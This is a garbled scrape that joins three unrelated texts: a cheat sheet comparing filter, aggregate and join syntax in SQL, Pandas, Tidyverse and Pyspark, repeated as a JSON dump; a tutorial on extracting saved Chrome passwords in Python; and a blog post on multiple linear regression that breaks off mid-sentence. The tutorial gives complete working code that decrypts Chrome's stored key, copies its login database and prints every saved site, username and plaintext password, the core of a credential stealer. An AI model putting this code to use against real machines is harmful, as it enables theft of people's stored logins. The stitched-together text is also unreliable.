similar to Tidyverse. The three common data operations include filter, aggregate and join.These three operations allow you to cut and merge tables, derive statistics such as average and percentage, and get ready for plotting and modeling. As data wrangling consumes a high percentage of data work time, these three common data operations should account for a large percentage of data wrangling time. Inclusion and exclusion are essential in data processing. We keep the relevant and discard the irrelevant. We can call inclusion and exclusion with one word: filter. Filter has two parts in tabular data. One is filtering columns and the other is filtering rows. Using the famous Iris data in this post, I list the filter operations in the four languages below. Question: What is the sepal length, petal length of Setosa with petal width larger than 1 ?# SQLselect Sepal_Length, Petal_Length from Iris where Petal_Width > 1 and Species=’setosa’;# PandasIris[(Iris.Petal_Width > 1) & (Iris.Species==’setosa’)][[‘Sepal_length’,’Petal_Length’]]# TidyverseIris %>% filter(Petal_Width > 1, Species==’setosa’) %>% select(Sepal_Length, Petal_Length)# PysparkIris.filter((Iris.Petal_Width > 1) & (Iris.Species==’setosa’)).select(Iris.Sepal_Length, Iris.Petal_Length) Pandas uses brackets to filter columns and rows, while Tidyverse uses functions. Pyspark API is determined by borrowing the best from both Pandas and Tidyverse. As you can see here, this Pyspark operation shares similarities with both Pandas and Tidyverse. SQL is declarative as always, showing up with its signature “select columns from table where row criteria”. Creating summary statistics such as count, sum and average are essential to data exploration and feature engineering. When categorical variables are available, it is also very common to group summary statistics by certain categorical variables. Question: How many sepal length records does each Iris species have in this data and what is their average sepal length ?# SQLselect Species, count(Sepal_Length) as Sepal_Length_Count, avg(Sepal_Length) as Sepal_Length_mean from Iris group by Species;# Pandasaggregated=Iris.groupby(by=’Species’,as_index=False).agg({‘Sepal_Length’: [‘mean’,’count’]})aggregated.columns = [‘_’.join(tup).rstrip(‘_’) for tup in temp1.columns.values]# TidyverseIris %>% group_by(Species) %>% summarize(Sepal_Length_mean=mean(Sepal_Length), Count=n())# Pysparkfrom pyspark.sql import functions as FIris.groupBy(Iris.species).agg(F.mean(Iris.sepal_length).alias(‘sepal_length_mean’),F.count(Iris.sepal_length).alias(‘sepal_length_count’)) This example is a good one to tell why the I get confused by the four languages. There are four slightly different ways to write “group by”: use group by in SQL, use groupby in Pandas, use group_by in Tidyverse and use groupBy in Pyspark (In Pyspark, both groupBy and groupby work, as groupby is an alias for groupBy in Pyspark. groupBylooks more authentic as it is used more often in official document). In terms of aggregation, Python is very different here. One, it uses a dictionary to specify aggregation operations. Two, it by default uses the group by variable as index, and you may have to deal with multiindex. One hallmark of big data work is integrating multiple data sources into one source for machine learning and modeling, therefore join operation is the must-have one. There is a list of joins available: left join, inner join, outer join, anti left join and others. Left join is used in the following example. Question: given a table Iris_preference that has my preference on each species, can you join this preference table with the original table for later preference analysis?# SQLselect a.*, b.* from Iris a left join Iris_preference b on a.Species=b.Species;# Pandaspd.merge(Iris, Iris_preference, how=’left’, on=’Species’)# Tidyverseleft_join(Iris, Iris_preference, by=”Species”)# PysparkIris.join(Iris_preference,[‘Species’],”left_outer”) It is really amazing that we have many ways to express the same intention, in programming languages and in natural languages. Language abundance is a blessing and curse. It may not be a bad idea for the community to standardize the APIs for the common data operations cross the languages in the future, which could eliminate frictions and increase portability. As of now, I survey the filter, aggregate and join operations in Pandas, Tidyverse, Pyspark and SQL to highlight the syntax nuances we deal with most often on a daily basis. The side by side comparisons above can not only serve as a cheat sheet to remind me the language differences but also help me with my transitions among these tools. I have a more concise version of this cheat sheet at my git repository here. Additionally, you may find other language specific cheat sheets helpful, they are from Pandas.org, R Studio and DataCamp. Data Wrangling with Pandas: link Data Wrangling with dplyr and tidyr: link Python for Data Science Pyspark: link If you want to add extra pairs of data operations into my cheat sheet, let’s connect!
[ { "code": null, "e": 1015, "s": 172, "text": "One of the most popular question asked by inspiring data scientists is which language they should learn for data science. The initial choices are usually between Python and R. There are already a lot of conversations to help make a language choice (here and here). Selecting an appropriate language is the first step, but I doubt most people end up using only one language. In my personal journey, I learned R first, then SQL, then Python, and then Spark. Now in my daily work, I use all of them because I find unique advantages in each of them (in terms of speed, ease of use, visualization and others). Some people do stay in only one camp (some Python people never think about learning R), but I prefer to use what available to create my best data solutions, and speaking multiple data languages help my collaboration with different teams." }, { "code": null, "e": 1627, "s": 1015, "text": "As the State of Machine Learning points out, we face a challenge of supporting multiple languages in data teams, one down side of working cross languages is that I confuse one with another as they may have very similar syntax. Respecting the fact that we enjoy a data science ecosystem with multiple coexisting languages, I would love to write down three common data transformation operations in these four languages side by side, in order to shed light on how they compare at syntax level. Putting syntax side by side also helps me synergize them better in my data science toolbox. I hope it helps you as well." }, { "code": null, "e": 1932, "s": 1627, "text": "Data science landscape is expansive, I decide to focus on the largest common denominator in this post. Without formal statistics to back up, I take the following for granted: most data science work is on tabular data; the common data languages are SQL, Python, R and Spark (not Julia, C++, SAS and etc.)." }, { "code": null, "e": 2351, "s": 1932, "text": "SQL has a long list of dialects (hive, mysql, postgresql, casandra and so on), I choose ANSI-standard SQL in this post. Pure Python and Base R is capable of manipulating data, however I choose Pandas for Python and Tidyverse for R in this post. Spark has RDD and Dataframe, I choose to focus on Dataframe. Spark has API in Pyspark and Sparklyr, I choose Pyspark here, because Sparklyr API is very similar to Tidyverse." }, { "code": null, "e": 2729, "s": 2351, "text": "The three common data operations include filter, aggregate and join.These three operations allow you to cut and merge tables, derive statistics such as average and percentage, and get ready for plotting and modeling. As data wrangling consumes a high percentage of data work time, these three common data operations should account for a large percentage of data wrangling time." }, { "code": null, "e": 3090, "s": 2729, "text": "Inclusion and exclusion are essential in data processing. We keep the relevant and discard the irrelevant. We can call inclusion and exclusion with one word: filter. Filter has two parts in tabular data. One is filtering columns and the other is filtering rows. Using the famous Iris data in this post, I list the filter operations in the four languages below." }, { "code": null, "e": 3588, "s": 3090, "text": "Question: What is the sepal length, petal length of Setosa with petal width larger than 1 ?# SQLselect Sepal_Length, Petal_Length from Iris where Petal_Width > 1 and Species=’setosa’;# PandasIris[(Iris.Petal_Width > 1) & (Iris.Species==’setosa’)][[‘Sepal_length’,’Petal_Length’]]# TidyverseIris %>% filter(Petal_Width > 1, Species==’setosa’) %>% select(Sepal_Length, Petal_Length)# PysparkIris.filter((Iris.Petal_Width > 1) & (Iris.Species==’setosa’)).select(Iris.Sepal_Length, Iris.Petal_Length)" }, { "code": null, "e": 3953, "s": 3588, "text": "Pandas uses brackets to filter columns and rows, while Tidyverse uses functions. Pyspark API is determined by borrowing the best from both Pandas and Tidyverse. As you can see here, this Pyspark operation shares similarities with both Pandas and Tidyverse. SQL is declarative as always, showing up with its signature “select columns from table where row criteria”." }, { "code": null, "e": 4198, "s": 3953, "text": "Creating summary statistics such as count, sum and average are essential to data exploration and feature engineering. When categorical variables are available, it is also very common to group summary statistics by certain categorical variables." }, { "code": null, "e": 4916, "s": 4198, "text": "Question: How many sepal length records does each Iris species have in this data and what is their average sepal length ?# SQLselect Species, count(Sepal_Length) as Sepal_Length_Count, avg(Sepal_Length) as Sepal_Length_mean from Iris group by Species;# Pandasaggregated=Iris.groupby(by=’Species’,as_index=False).agg({‘Sepal_Length’: [‘mean’,’count’]})aggregated.columns = [‘_’.join(tup).rstrip(‘_’) for tup in temp1.columns.values]# TidyverseIris %>% group_by(Species) %>% summarize(Sepal_Length_mean=mean(Sepal_Length), Count=n())# Pysparkfrom pyspark.sql import functions as FIris.groupBy(Iris.species).agg(F.mean(Iris.sepal_length).alias(‘sepal_length_mean’),F.count(Iris.sepal_length).alias(‘sepal_length_count’))" }, { "code": null, "e": 5321, "s": 4916, "text": "This example is a good one to tell why the I get confused by the four languages. There are four slightly different ways to write “group by”: use group by in SQL, use groupby in Pandas, use group_by in Tidyverse and use groupBy in Pyspark (In Pyspark, both groupBy and groupby work, as groupby is an alias for groupBy in Pyspark. groupBylooks more authentic as it is used more often in official document)." }, { "code": null, "e": 5536, "s": 5321, "text": "In terms of aggregation, Python is very different here. One, it uses a dictionary to specify aggregation operations. Two, it by default uses the group by variable as index, and you may have to deal with multiindex." }, { "code": null, "e": 5843, "s": 5536, "text": "One hallmark of big data work is integrating multiple data sources into one source for machine learning and modeling, therefore join operation is the must-have one. There is a list of joins available: left join, inner join, outer join, anti left join and others. Left join is used in the following example." }, { "code": null, "e": 6279, "s": 5843, "text": "Question: given a table Iris_preference that has my preference on each species, can you join this preference table with the original table for later preference analysis?# SQLselect a.*, b.* from Iris a left join Iris_preference b on a.Species=b.Species;# Pandaspd.merge(Iris, Iris_preference, how=’left’, on=’Species’)# Tidyverseleft_join(Iris, Iris_preference, by=”Species”)# PysparkIris.join(Iris_preference,[‘Species’],”left_outer”)" }, { "code": null, "e": 6405, "s": 6279, "text": "It is really amazing that we have many ways to express the same intention, in programming languages and in natural languages." }, { "code": null, "e": 7178, "s": 6405, "text": "Language abundance is a blessing and curse. It may not be a bad idea for the community to standardize the APIs for the common data operations cross the languages in the future, which could eliminate frictions and increase portability. As of now, I survey the filter, aggregate and join operations in Pandas, Tidyverse, Pyspark and SQL to highlight the syntax nuances we deal with most often on a daily basis. The side by side comparisons above can not only serve as a cheat sheet to remind me the language differences but also help me with my transitions among these tools. I have a more concise version of this cheat sheet at my git repository here. Additionally, you may find other language specific cheat sheets helpful, they are from Pandas.org, R Studio and DataCamp." }, { "code": null, "e": 7211, "s": 7178, "text": "Data Wrangling with Pandas: link" }, { "code": null, "e": 7253, "s": 7211, "text": "Data Wrangling with dplyr and tidyr: link" }, { "code": null, "e": 7291, "s": 7253, "text": "Python for Data Science Pyspark: link" } ]
How to Extract Chrome Passwords in Python? - GeeksforGeeks
21 Apr, 2021 In this article, we will discuss how to extract all passwords stored in the Chrome browser. Note: This article is for users who use Chrome on Windows. If you are a Mac or Linux user, you may need to make some changes to the given path, while the rest of the Python program will remain the same. Now, Let’s install some important libraries which we need to write a python program through which we can extract Chrome Passwords. pip install pycryptodome pip install pypiwin32 Before we extract the password directly from Chrome, we need to define some useful functions that will help our main functions. First Function def chrome_date_and_time(chrome_data): # Chrome_data format is # year-month-date hr:mins:seconds.milliseconds # This will return datetime.datetime Object return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data) The chrome_date_and_time() function is responsible for converting Chrome’s date format into a human-readable date and time format. Chrome Date and time format look like this: 'year-month-date hr:mins:seconds.milliseconds' Example: 2020-06-01 10:49:01.824691 Second Function def fetching_encryption_key(): # Local_computer_directory_path will # look like this below # C: => Users => <Your_Name> => AppData => # Local => Google => Chrome => User Data => # Local State local_computer_directory_path = os.path.join( os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_computer_directory_path, "r", encoding="utf-8") as f: local_state_data = f.read() local_state_data = json.loads(local_state_data) # decoding the encryption key using base64 encryption_key = base64.b64decode( local_state_data["os_crypt"]["encrypted_key"]) # remove Windows Data Protection API (DPAPI) str encryption_key = encryption_key[5:] # return decrypted key return win32crypt.CryptUnprotectData( encryption_key, None, None, None, 0)[1] The fetching_encryption_key() function obtains and decodes the AES key used to encrypt the password. It is saved as a JSON file in “C:\Users\<Your_PC_Name>\AppData\Local\Google\Chrome\User Data\Local State”. This function will be useful for the encrypted key. Third Function def password_decryption(password, encryption_key): try: iv = password[3:15] password = password[15:] # generate cipher cipher = AES.new(encryption_key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "No Passwords" password_decryption() takes the encrypted password and AES key as parameters and returns the decrypted version or Human Readable format of the password. Below is the implementation. Python3 import osimport jsonimport base64import sqlite3import win32cryptfrom Cryptodome.Cipher import AESimport shutilfrom datetime import timezone, datetime, timedelta def chrome_date_and_time(chrome_data): # Chrome_data format is 'year-month-date # hr:mins:seconds.milliseconds # This will return datetime.datetime Object return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data) def fetching_encryption_key(): # Local_computer_directory_path will look # like this below # C: => Users => <Your_Name> => AppData => # Local => Google => Chrome => User Data => # Local State local_computer_directory_path = os.path.join( os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_computer_directory_path, "r", encoding="utf-8") as f: local_state_data = f.read() local_state_data = json.loads(local_state_data) # decoding the encryption key using base64 encryption_key = base64.b64decode( local_state_data["os_crypt"]["encrypted_key"]) # remove Windows Data Protection API (DPAPI) str encryption_key = encryption_key[5:] # return decrypted key return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1] def password_decryption(password, encryption_key): try: iv = password[3:15] password = password[15:] # generate cipher cipher = AES.new(encryption_key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "No Passwords" def main(): key = fetching_encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromePasswords.db" shutil.copyfile(db_path, filename) # connecting to the database db = sqlite3.connect(filename) cursor = db.cursor() # 'logins' table has the data cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins " "order by date_last_used") # iterate over all rows for row in cursor.fetchall(): main_url = row[0] login_page_url = row[1] user_name = row[2] decrypted_password = password_decryption(row[3], key) date_of_creation = row[4] last_usuage = row[5] if user_name or decrypted_password: print(f"Main URL: {main_url}") print(f"Login URL: {login_page_url}") print(f"User name: {user_name}") print(f"Decrypted Password: {decrypted_password}") else: continue if date_of_creation != 86400000000 and date_of_creation: print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}") if last_usuage != 86400000000 and last_usuage: print(f"Last Used: {str(chrome_date_and_time(last_usuage))}") print("=" * 100) cursor.close() db.close() try: # trying to remove the copied db file as # well from local computer os.remove(filename) except: pass if __name__ == "__main__": main() Output: For the above code, we followed these below steps; First, we use the previously defined function fetching_encryption_key() to obtain the encryption key Then copy the SQLite database in “C:\Users\<Your_PC_Name>\AppData\Local\Google\Chrome\User Data\default\Login Data” where the saved Password data is stored of the current directory and establish a connection with it. This is because the original database file locked when Chrome started. With the help of the cursor object, we will execute the SELECT SQL query from the ‘logins’ table order by date_last_used. Traverse all the login rows in a more readable format to obtain the passwords for each password and format date_created and date_last_used. Finally, With the help of print statements, we will print all the saved credentials which are extracted from Chrome. Delete the copy of the database from the current directory. Picked Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Box Plot in Python using Matplotlib Bar Plot in Matplotlib Python | Get dictionary keys as a list Python | Convert set into a list Ways to filter Pandas DataFrame by column values Python - Call function from another file loops in python Multithreading in Python | Set 2 (Synchronization) Python Dictionary keys() method Python Lambda Functions
[ { "code": null, "e": 23901, "s": 23873, "text": "\n21 Apr, 2021" }, { "code": null, "e": 23994, "s": 23901, "text": "In this article, we will discuss how to extract all passwords stored in the Chrome browser. " }, { "code": null, "e": 24197, "s": 23994, "text": "Note: This article is for users who use Chrome on Windows. If you are a Mac or Linux user, you may need to make some changes to the given path, while the rest of the Python program will remain the same." }, { "code": null, "e": 24328, "s": 24197, "text": "Now, Let’s install some important libraries which we need to write a python program through which we can extract Chrome Passwords." }, { "code": null, "e": 24375, "s": 24328, "text": "pip install pycryptodome\npip install pypiwin32" }, { "code": null, "e": 24504, "s": 24375, "text": "Before we extract the password directly from Chrome, we need to define some useful functions that will help our main functions. " }, { "code": null, "e": 24519, "s": 24504, "text": "First Function" }, { "code": null, "e": 24757, "s": 24519, "text": "def chrome_date_and_time(chrome_data):\n\n # Chrome_data format is \n # year-month-date hr:mins:seconds.milliseconds\n # This will return datetime.datetime Object\n return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)" }, { "code": null, "e": 24889, "s": 24757, "text": "The chrome_date_and_time() function is responsible for converting Chrome’s date format into a human-readable date and time format. " }, { "code": null, "e": 24933, "s": 24889, "text": "Chrome Date and time format look like this:" }, { "code": null, "e": 24980, "s": 24933, "text": "'year-month-date hr:mins:seconds.milliseconds'" }, { "code": null, "e": 24989, "s": 24980, "text": "Example:" }, { "code": null, "e": 25016, "s": 24989, "text": "2020-06-01 10:49:01.824691" }, { "code": null, "e": 25032, "s": 25016, "text": "Second Function" }, { "code": null, "e": 25979, "s": 25032, "text": "def fetching_encryption_key():\n \n # Local_computer_directory_path will\n # look like this below\n # C: => Users => <Your_Name> => AppData => \n # Local => Google => Chrome => User Data => \n # Local State\n \n local_computer_directory_path = os.path.join(\n os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\",\n \"Chrome\", \"User Data\", \"Local State\")\n \n with open(local_computer_directory_path, \"r\", encoding=\"utf-8\") as f:\n local_state_data = f.read()\n local_state_data = json.loads(local_state_data)\n\n # decoding the encryption key using base64\n encryption_key = base64.b64decode(\n local_state_data[\"os_crypt\"][\"encrypted_key\"])\n \n # remove Windows Data Protection API (DPAPI) str\n encryption_key = encryption_key[5:]\n \n # return decrypted key\n return win32crypt.CryptUnprotectData(\n encryption_key, None, None, None, 0)[1]" }, { "code": null, "e": 26239, "s": 25979, "text": "The fetching_encryption_key() function obtains and decodes the AES key used to encrypt the password. It is saved as a JSON file in “C:\\Users\\<Your_PC_Name>\\AppData\\Local\\Google\\Chrome\\User Data\\Local State”. This function will be useful for the encrypted key." }, { "code": null, "e": 26254, "s": 26239, "text": "Third Function" }, { "code": null, "e": 26724, "s": 26254, "text": "def password_decryption(password, encryption_key):\n\n try:\n iv = password[3:15]\n password = password[15:]\n \n # generate cipher\n cipher = AES.new(encryption_key, AES.MODE_GCM, iv)\n \n # decrypt password\n return cipher.decrypt(password)[:-16].decode()\n except:\n try:\n return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])\n except:\n return \"No Passwords\"" }, { "code": null, "e": 26877, "s": 26724, "text": "password_decryption() takes the encrypted password and AES key as parameters and returns the decrypted version or Human Readable format of the password." }, { "code": null, "e": 26906, "s": 26877, "text": "Below is the implementation." }, { "code": null, "e": 26914, "s": 26906, "text": "Python3" }, { "code": "import osimport jsonimport base64import sqlite3import win32cryptfrom Cryptodome.Cipher import AESimport shutilfrom datetime import timezone, datetime, timedelta def chrome_date_and_time(chrome_data): # Chrome_data format is 'year-month-date # hr:mins:seconds.milliseconds # This will return datetime.datetime Object return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data) def fetching_encryption_key(): # Local_computer_directory_path will look # like this below # C: => Users => <Your_Name> => AppData => # Local => Google => Chrome => User Data => # Local State local_computer_directory_path = os.path.join( os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\", \"Chrome\", \"User Data\", \"Local State\") with open(local_computer_directory_path, \"r\", encoding=\"utf-8\") as f: local_state_data = f.read() local_state_data = json.loads(local_state_data) # decoding the encryption key using base64 encryption_key = base64.b64decode( local_state_data[\"os_crypt\"][\"encrypted_key\"]) # remove Windows Data Protection API (DPAPI) str encryption_key = encryption_key[5:] # return decrypted key return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1] def password_decryption(password, encryption_key): try: iv = password[3:15] password = password[15:] # generate cipher cipher = AES.new(encryption_key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return \"No Passwords\" def main(): key = fetching_encryption_key() db_path = os.path.join(os.environ[\"USERPROFILE\"], \"AppData\", \"Local\", \"Google\", \"Chrome\", \"User Data\", \"default\", \"Login Data\") filename = \"ChromePasswords.db\" shutil.copyfile(db_path, filename) # connecting to the database db = sqlite3.connect(filename) cursor = db.cursor() # 'logins' table has the data cursor.execute( \"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins \" \"order by date_last_used\") # iterate over all rows for row in cursor.fetchall(): main_url = row[0] login_page_url = row[1] user_name = row[2] decrypted_password = password_decryption(row[3], key) date_of_creation = row[4] last_usuage = row[5] if user_name or decrypted_password: print(f\"Main URL: {main_url}\") print(f\"Login URL: {login_page_url}\") print(f\"User name: {user_name}\") print(f\"Decrypted Password: {decrypted_password}\") else: continue if date_of_creation != 86400000000 and date_of_creation: print(f\"Creation date: {str(chrome_date_and_time(date_of_creation))}\") if last_usuage != 86400000000 and last_usuage: print(f\"Last Used: {str(chrome_date_and_time(last_usuage))}\") print(\"=\" * 100) cursor.close() db.close() try: # trying to remove the copied db file as # well from local computer os.remove(filename) except: pass if __name__ == \"__main__\": main()", "e": 30357, "s": 26914, "text": null }, { "code": null, "e": 30365, "s": 30357, "text": "Output:" }, { "code": null, "e": 30416, "s": 30365, "text": "For the above code, we followed these below steps;" }, { "code": null, "e": 30517, "s": 30416, "text": "First, we use the previously defined function fetching_encryption_key() to obtain the encryption key" }, { "code": null, "e": 30806, "s": 30517, "text": "Then copy the SQLite database in “C:\\Users\\<Your_PC_Name>\\AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data” where the saved Password data is stored of the current directory and establish a connection with it. This is because the original database file locked when Chrome started. " }, { "code": null, "e": 30928, "s": 30806, "text": "With the help of the cursor object, we will execute the SELECT SQL query from the ‘logins’ table order by date_last_used." }, { "code": null, "e": 31068, "s": 30928, "text": "Traverse all the login rows in a more readable format to obtain the passwords for each password and format date_created and date_last_used." }, { "code": null, "e": 31185, "s": 31068, "text": "Finally, With the help of print statements, we will print all the saved credentials which are extracted from Chrome." }, { "code": null, "e": 31245, "s": 31185, "text": "Delete the copy of the database from the current directory." }, { "code": null, "e": 31252, "s": 31245, "text": "Picked" }, { "code": null, "e": 31259, "s": 31252, "text": "Python" }, { "code": null, "e": 31357, "s": 31259, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31366, "s": 31357, "text": "Comments" }, { "code": null, "e": 31379, "s": 31366, "text": "Old Comments" }, { "code": null, "e": 31415, "s": 31379, "text": "Box Plot in Python using Matplotlib" }, { "code": null, "e": 31438, "s": 31415, "text": "Bar Plot in Matplotlib" }, { "code": null, "e": 31477, "s": 31438, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 31510, "s": 31477, "text": "Python | Convert set into a list" }, { "code": null, "e": 31559, "s": 31510, "text": "Ways to filter Pandas DataFrame by column values" }, { "code": null, "e": 31600, "s": 31559, "text": "Python - Call function from another file" }, { "code": null, "e": 31616, "s": 31600, "text": "loops in python" }, { "code": null, "e": 31667, "s": 31616, "text": "Multithreading in Python | Set 2 (Synchronization)" }, { "code": null, "e": 31699, "s": 31667, "text": "Python Dictionary keys() method" } ]
Super Simple Machine Learning — Multiple Linear Regression Part 1 | by Bernadette Low | Towards Data Science
In this super long post, I cover Multiple Linear Regression describing briefly(lol) how it works and what criteria you need to take note of. So get yourself water and snacks, cause this will take a while. The bulk of the basic concepts were covered in my Simple Linear Regression posts, which can be found here. I had intended to quickly cover MLR in one post, but there’s really too many things to address. Sigh. It’s like when your sister had a baby who was once the sole contributor to all the noise in the house, but then she had a couple more and now all three are contributing to the noise. becomes The multiple linear regression explains the relationship between one continuous dependent variable (y) and two or more independent variables (x1, x2, x3... etc). Note that it says CONTINUOUS dependant variable. Since y is the sum of beta, beta1 x1, beta2 x2 etc etc, the resulting y will be a number, a continuous variable, instead of a “yes”, “no” answer (categorical). For example, with linear regression, I would be trying to find out how much Decibels of noise is being produced, and not if it’s noisy or not (Noisy | Not). To find categorical variables (e.g “yes” or “no”, “1” or “0”), logistic regression would be used. I’ll cover this next time. Datasets to try your code on can be found everywhere. sklearn has toy datasets for different types of algorithms (regression, classification etc) which are great for practice. Kaggle also has real-life datasets. Note that in the wild, when you do encounter a dataset, it is going to be ugly AF. It’s going to have missing values, erroneous entries, wrongly formatted columns, irrelevant variables... and even after cleaning it, maybe your p-values look terrible and your R squared is too low. You’ll need to select good features, try different algorithms, tune your hyperparameters, add a time lag, transform the column’s data.... It’s not that straightforward in real-life to run a model, and that’s why people get paid a lot to do this, so that they can fund their scalp treatment to recover from stress-induced hair loss. Due to the nature of the regression equation, your x variables have to be continuous as well. Thus, you’ll need to look into changing your categorical variables into continuous ones. Continuous variables are simply put, running numbers. Categorical variables are categories. It gets slightly confusing when your categorical variables appear continuous at first. For example, what if there was a column of zip codes or phone numbers? Every zip code represents a unique address and every phone number is just a unique contact number. Increasing/decreasing this number does not have any meaning — they are merely identifiers with no intrinsic numerical value, and hence, are considered categorical. Categorical Variables are also referred to as discrete or qualitative variables. There are 3 types: Nominal : more than 2 types. e.g color Dichotomous: 2 types e.g yes or no Ordinal: more than 2 types, but have a rank/order e.g Below average, Average, Above Average There are several ways to change a categorical data into continuous variables that can be used in regression. The simple solution for dichotomous variables would be to change it into binary — “1” means “yes” and “0” means “no” or vice versa. Your label should start at 0. Nominal and Ordinal variables are slightly more troublesome. Let’s say you have 3 different colours: Red, Blue and Grey. Following the concept above, you label Red as 0, Blue as 1 and Grey as 2. The problem with doing this is that it implies that Grey is of a higher level than Red and Blue and Blue is of a higher level that Red, which if you consider all three just colours with equal “value”, none of these colours should be of higher level than the other. “Ranking” with labels would work better for Ordinal variables, since they do have a rank and should be given different weightage. When facing nominal variables that should not have different weightage, one hot encoding is preferred. In order not to give categories that are on an even playing field any unequal values, we use one hot encoding. This is done by creating dummy variables, which means creating more “x”s. These would be fake/dummy variables because they are placeholders for your actual variable and were created by you yourself. It’s easy. For every level your variable is, just create a new x for each level. Wait... What about Grey? If your variable can only be 3 colours, then you should only be using 2 dummy variables. Grey becomes the reference category, in the case that your X(blue) and X(red) are both 0, then by default the variable would be Grey. Does it matter which variable you choose to exclude and use as a reference category? No. But the best practice would be to use the category that happens most often (e.g if 70% of the dataset is grey, then grey would be the reference category). Going back to the column of zip codes, let’s say you have 500 rows of clients, all with their own unique zip codes. Does it make sense to hot encode 500 different zip codes? That’s going to add 500 columns to your dataset, cluttering your model and blessing you with a migraine. It is also absolutely pointless since every zip code is unique. It adds no insight to your model because how would you use such information to predict an outcome on new data? If you need to predict the income level of someone living at zip code 323348, how the heck would your model handle that if no such zip code was in your dataset? It has never seen this zip code before and cannot tell you anything about it. What you can do is to transform it into something that you could be used to classify future data, such as grouping these zip codes by their areas (this data would not be in the dataset but needs to be from domain knowledge or research). So instead of 500 different zip codes, you get 4 regions, North, South, East or West (OR depending on how specific you want to get, it could be actual areas like Hougang, Yishun, Bedok, Orchard etc. these are names of areas in Singapore). That means if new data comes in where you need to predict the outcome, you can predict the y based on which area the new zip code falls into. One thing to always keep in mind is not to label blindly. It has to make sense. For example, when encoding ordinal variables (categorical variables with rank), you must ensure that the rank value corresponds to the actual significance of each rank (which can also be seen as its relationship with the dependant variable). For example, if you are selling a house, and y = price, while one of the x variables is the floor the apartment is on, encoding the floors as integers make sense if the floors increase in price as it increases in level: However, if the value does not increase accordingly, perhaps one hot encoding and combining the levels would be more appropriate: Or Or if you have no idea what the relationship is: Always ensure that no matter how you transform your categorical variables, make sure you look back at it and ask yourself “does that make sense?” Sometimes there is no right answer, so the question then becomes “does that make more sense?” which might potentially become, “but what makes any sense?” and lead into “what is sense?” which becomes “what is?” and then segue into a week spent in existential nihilism. Bottom line is: Know Thy Data Having too many variables could potentially cause your model to become less accurate, especially if certain variables have no effect on the outcome or have a significant effect on other variables. Let’s take for example the 3 babies screaming. If I were to model my regression equation to find out the decibels of noise being produced based on these 4 variables = baby 1, baby 2, baby 3, lamp (on or off) , it would not be a good model. This is because my spidey senses are telling me that a lamp should not contribute to noise, so any possible correlation between lamp and noise would be spurious and inaccurate. Basic step of Feature Selection: Use your Common and/or Business Sense(s) One other way to select features is to use the p-values. As we last discussed, p-values tell you how statistically significant the variable is. Removing variables with high p-values can cause your accuracy/R squared to increase, and even the p-values of the other variables to increase as well — and that’s a good sign. This action of omitting variables is part of stepwise regression. There are 3 ways to do this: Forward Selection: Start with 0. Run the model over and over, trying each variable. Find the variable that gives the best metric (E.g p-values, Adjusted R-squared, SSE, % accuracy) and stick with it. Run model again with the chosen variable, trying one of the remaining variables at each time and sticking with the best one. Repeat process until the adding does not improve the model any more. Backward Elimination: Start with all variables. Try model out multiple times, excluding one variable at each time. Remove variable that causes the model to improve the most when it is left out. Repeat process without the removed variable, until the metric(s) you are judging on can no longer improve. Bidirectional Elimination: Do a forward selection, but then do backward eliminations as well at some stages. So you can be at a stage where you’ve added X1, X2, X5 and X8, then do elimination by taking out X2. This is a good example. There are R and Python packages created by amazing people that automate these processes to choose the “best model” based on a particular metric (e.g adjusted R Squared or AIC or p-values).Here are some I found. NOTE: Stepwise regression is a quick and fast way to get better scoring models, especially when you’re running simple models. It’s widely used, but also widely criticised as being inaccurate. I’ve always been taught to use stepwise, so I would love to hear your opinions about it. An alternative to stepwise regression would be the LASSO (Least Absolute Shrinkage and Selection Operator) method, which I will cover next time. Or you can read about it here. Checking for collinearity helps you get rid of variables that are skewing your data by having a significant relationship with another variable. Correlation between variables describe the relationship between two variables. If they are extremely correlated, then they are collinear. Autocorrelation occurs when a variable’s data affects another instance of that same variable (same column, different row). Linear regression only works if there is little or no autocorrelation in the dataset, and each instance is independent of each other. If instances are autocorrelated then your residuals are not independent from each other, and will show a pattern. This usually occurs in time series datasets, so I will go into more details when I cover Time Series Regression. Multicollinearity exists when two or more of the predictors (x variables) in a regression model are moderately or highly correlated (different column). When one of our predictors is able to strongly predict another predictor or have weird relationships with each other (maybe x2 = x3 or x2 = 2(x3) + x4), then your regression equation is going to be a mess. Why is multicollinearity an issue with regression? Well, the regression equation is the best fit line to represent the effects of your predictors and the dependant variable, and does not include the effects of one predictor on another. Having high collinearity (correlation of 1.00) between predictors will affect your coefficients and the accuracy, plus its ability to reduce the SSE (sum of squared errors — that thing you need to minimise with your regression). The simplest method to detect collinearity would be to plot it out in graphs or to view a correlation matrix to check out pairwise correlation (correlation between 2 variables). If you have two variables that are highly correlated, your best course of action is to just remove one of them. When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect.When you run one model with that x 